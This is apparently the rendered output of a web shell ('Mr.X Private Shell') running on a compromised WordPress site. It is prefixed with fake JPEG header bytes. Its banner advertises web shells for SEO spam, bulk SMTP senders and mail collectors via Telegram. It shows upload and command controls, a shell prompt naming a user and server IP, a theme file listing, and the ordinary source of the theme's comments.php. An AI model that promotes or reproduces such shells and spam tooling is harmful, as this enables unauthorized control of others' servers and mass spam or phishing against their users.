����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

chassiw@216.73.217.25: ~ $
<?php
/**
 * The template for displaying posts in the Video post format
 *
 * @author     Gaviasthemes Team     
 * @copyright  Copyright (C) 2020 gaviasthemes. All Rights Reserved.
 * @license    GNU/GPL v2 or later http://www.gnu.org/licenses/gpl-2.0.html
 */
?>

<?php
   if ( post_password_required() ){
      return;
   }
?>
<div id="comments">

    <?php if ( have_comments() ) { ?>
        <h2 class="comments-title">
          <?php
            printf( _nx( 'One thought on &ldquo;%2$s&rdquo;', '%1$s thoughts on &ldquo;%2$s&rdquo;', get_comments_number(), 'comments title', 'indutri' ),
              number_format_i18n( get_comments_number() ), get_the_title() );
          ?>
        </h2>
        
        <div class="gav-comment-list clearfix">
          
          <ol class="pingbacklist">
            <?php
                wp_list_comments( array( 'type' => 'pingback', 'callback' => 'indutri_comment_template', 'short_ping'  => true ) );
            ?>
         </ol>
          <ol class="comment-list">
              <?php wp_list_comments('type=comment&callback=indutri_comment_template'); ?>
          </ol>
          <?php
          if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) :
          ?>
          <footer class="navigation comment-navigation" role="navigation">
              <div class="previous"><?php previous_comments_link( esc_html__( '&larr; Older Comments', 'indutri') ); ?></div>
              <div class="next right"><?php next_comments_link( esc_html__( 'Newer Comments &rarr;', 'indutri') ); ?></div>
          </footer>
          <?php endif; ?>

          <?php if ( ! comments_open() && get_comments_number() ) : ?>
              <p class="no-comments"><?php echo esc_html__( 'Comments are closed.' , 'indutri'); ?></p>
          <?php endif; ?>
        </div>
    <?php } ?>

   <?php
        $aria_req = ( $req ? " aria-required='true'" : '' );
        $comment_field = '
          <div class="form-group">
            <textarea placeholder="' . esc_attr__('Write Your Comment', 'indutri') . '" rows="8" id="comment" class="form-control"  name="comment"'.$aria_req.'></textarea>
          </div>
        ';
        if(class_exists('Indutri_Themer_Comment')){
          $comment_field = Indutri_Themer_Comment::getInstance()->comment_field($aria_req) . $comment_field;
        }
        $comment_args = array(
          'title_reply'=> ('<div class="title">'.esc_html__('Add a Comment','indutri').'</div>'),
          'comment_field' => $comment_field,
                        
          'fields' => apply_filters(
            'comment_form_default_fields',
            array(
              'author' => '<div class="row"><div class="form-group col-sm-6 col-xs-12">
                <input type="text" name="author" placeholder="'.esc_attr__('Your Name *', 'indutri').'" class="form-control" id="author" value="' . esc_attr( $commenter['comment_author'] ) . '" ' . $aria_req . ' />
                </div>',
              'email' => ' <div class="form-group col-sm-6 col-xs-12">
                <input id="email" name="email" placeholder="'.esc_attr__('Email *', 'indutri').'" class="form-control" type="text" value="' . esc_attr(  $commenter['comment_author_email'] ) . '" ' . $aria_req . ' />
                </div></div>',
              'url' => '<div class="form-group">
                <input id="url" placeholder="'.esc_attr__('Website', 'indutri').'" name="url" class="form-control" type="text" value="' . esc_attr( $commenter['comment_author_url'] ) . '"  />
                </div>',         
            )),
            'label_submit' => 'Post Comment',
            'comment_notes_before' => '<div class="form-group h-info">'.esc_html__('Your email address will not be published.','indutri').'</div>',
            'comment_notes_after' => '',
        );
    ?>
   <?php global $post; ?>
   <?php if('open' == $post->comment_status){ ?>
   <div class="commentform reset-button-default">
      <div class="commentform-inner">
         <?php indutri_comment_form($comment_args); ?>
      </div>
    </div><!-- end commentform -->
   <?php } ?>
</div><!-- end comments -->

Filemanager

Name Type Size Permission Actions
css Folder 0755
fonts Folder 0755
images Folder 0755
includes Folder 0755
js Folder 0755
languages Folder 0755
sass Folder 0755
templates Folder 0755
tribe Folder 0755
tribe-events Folder 0755
woocommerce Folder 0755
404.php File 985 B 0644
archive.php File 2.27 KB 0644
comments.php File 4.04 KB 0644
content-audio.php File 2.55 KB 0644
content-gallery.php File 2.89 KB 0644
content-link.php File 2.36 KB 0644
content-quote.php File 2.39 KB 0644
content-video.php File 2.68 KB 0644
content.php File 2.44 KB 0644
footer.php File 1.7 KB 0644
functions.php File 39.27 KB 0644
functions.php_bak File 12.7 KB 0644
functions.txt File 12.7 KB 0644
header-builder.php File 1.78 KB 0644
header-default.php File 3.54 KB 0644
header.php File 500 B 0644
index.php File 2.54 KB 0644
page.php File 588 B 0644
readme.txt File 0 B 0644
screenshot.png File 210.79 KB 0644
search.php File 4.02 KB 0644
searchform.php File 674 B 0644
sidebar.php File 280 B 0644
single-event.php File 353 B 0644
single-footer.php File 974 B 0644
single-gallery.php File 1.09 KB 0644
single-gva_header.php File 922 B 0644
single-gva_team.php File 6.39 KB 0644
single-portfolio.php File 5.61 KB 0644
single-service.php File 3.14 KB 0644
single.php File 3.21 KB 0644
style.css File 935 B 0644
taxonomy-category_portfolio.php File 3.06 KB 0644
taxonomy-category_service.php File 3.04 KB 0644
wpml-config.xml File 11.38 KB 0644